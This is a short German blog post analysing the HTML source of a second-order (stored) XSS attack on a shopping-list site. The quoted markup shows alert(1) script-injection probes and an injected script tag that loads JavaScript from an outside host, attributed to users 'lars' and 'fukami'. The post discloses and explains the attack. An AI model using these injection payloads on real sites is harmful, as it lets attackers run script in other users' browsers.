Update: Analyse des HTML Sourcecodes der Second Order Attacke

Ein kleines Update zum vorherigen Beitrag: der Nutzer „lars“ schien harmlos zu sein. Schaut man sich den HTML-Quellcode näher an, kommt ein altbekanntes Gesicht zum Vorschein:

		
<div class="listitem searchlists">
		<a href="index.php?action=lists&subaction=show_detail&list_lookup_id=111128">
<img class="listthumb" src="http://s3.amazonaws.com/product_thumbs/" alt="" title=""/></a>
		<span class="listtitle">"><script>alert(1)</script></span><br />

		"><script>alert(1)</script><br />
		<span class="addedby">Erstellt von lars</span>
	</div>
		<div class="listitem searchlists">
		<a href="index.php?action=lists&subaction=show_detail&list_lookup_id=111129">
<img class="listthumb" src="http://s3.amazonaws.com/product_thumbs/" alt="" title=""/></a>
		<span class="listtitle">"><script>alert(1)</script></span><br />

		"><script>alert(1)</script><br />
		<span class="addedby">Erstellt von lars</span>
	</div>
		<div class="listitem searchlists">
		<a href="index.php?action=lists&subaction=show_detail&list_lookup_id=111130">
<img class="listthumb" src="http://s3.amazonaws.com/product_thumbs/" alt="fnord fnord">fnord
<script src=http://o01o.f-4" title="fnord fnord">fnord<script src=http://o01o.f-4"/></a>
		<span class="listtitle">"><script src=http://o01o.f-451.net/a.js></sc</span><br />
		"><script src=http://o01o.f-451.net/a.js></script>foo<br />
		<span class="addedby"><strong>Erstellt von fukami</strong></span>

 

fukami.

Avatar-Foto

Von Björn Schotte

Björn Schotte ist geschäftsführender Gesellschafter der Mayflower GmbH und Senior Consultant im Umfeld von Software- und Agilen Organisations-Themen. Er twittert unter @BjoernSchotte und ist auf Xing sowie LinkedIn erreichbar. Seine Vorträge finden sich bei Slideshare.

Ein Kommentar

  1. Ich wollte Nico Lumma zum Launch von shoppero.com beglückwünschen und wie es sich unter Kollegen gehört per E-Mail noch ein paar Verbesserungswünsche (auch aus sicherheitstechnischer Sicht) zum Launch zumailen. Über die Vorstellung eines sogenannten Adg

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert